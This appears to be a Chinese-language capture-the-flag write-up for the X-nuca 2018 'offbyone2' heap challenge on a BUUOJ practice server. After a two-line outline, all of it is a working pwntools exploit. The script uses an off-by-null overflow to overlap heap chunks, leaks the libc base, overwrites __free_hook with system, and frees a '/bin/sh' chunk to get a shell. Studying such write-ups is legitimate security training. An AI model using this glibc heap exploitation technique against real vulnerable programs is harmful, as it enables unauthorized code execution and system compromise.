思路
off by null構造堆重疊然這裏的堆塊個數充足直接打2次第一次leak libc基址
再次佈置好堆塊然後打free_hook拿到shell
exp:
from pwn import *
#p=process('./X-nuca_2018_offbyone2')
p=remote('node3.buuoj.cn',28262)
elf=ELF('./X-nuca_2018_offbyone2')
libc=elf.libc
def add(size,note):
p.sendlineafter('>> ','1')
p.sendlineafter('length: ',str(size))
p.sendlineafter('note:',note)
def delete(idx):
p.sendlineafter('>> ','2')
p.sendlineafter('index: ',str(idx))
def show(idx):
p.sendlineafter('>> ','3')
p.sendlineafter('index: ',str(idx))
for i in xrange(7):
add(0xf0,'aaa')
add(0xf0,'a')#7
add(0x88,'d'*0x87)#8
add(0x110,'f'*0xf0+p64(0x100)+p64(0x21))#9
for i in xrange(7):
delete(i)
delete(7)
delete(8)
add(0x88,'a'*0x80+p64(0x190))
delete(9)
for i in range(7):
add(0xf0,'aa')
add(0xf0,'aaa')
show(0)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-96-0x10
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
add(0x88,'aaaa')
add(0xf0,'aaaa')
add(0xf0,'a')
add(0x88,'vv')
add(0x110,'f'*0xf0+p64(0x100)+p64(0x21))
for i in range(7):
delete(i)
delete(7)
delete(11)
delete(12)
add(0x88,'a'*0x80+p64(0x190))
delete(13)
delete(0)
add(0x280,'a'*(0x90+0x60)+p64(0)+p64(0x91)+p64(free_hook))
add(0x88,'/bin/sh\x00')
add(0x88,p64(system))
delete(1)
p.interactive()
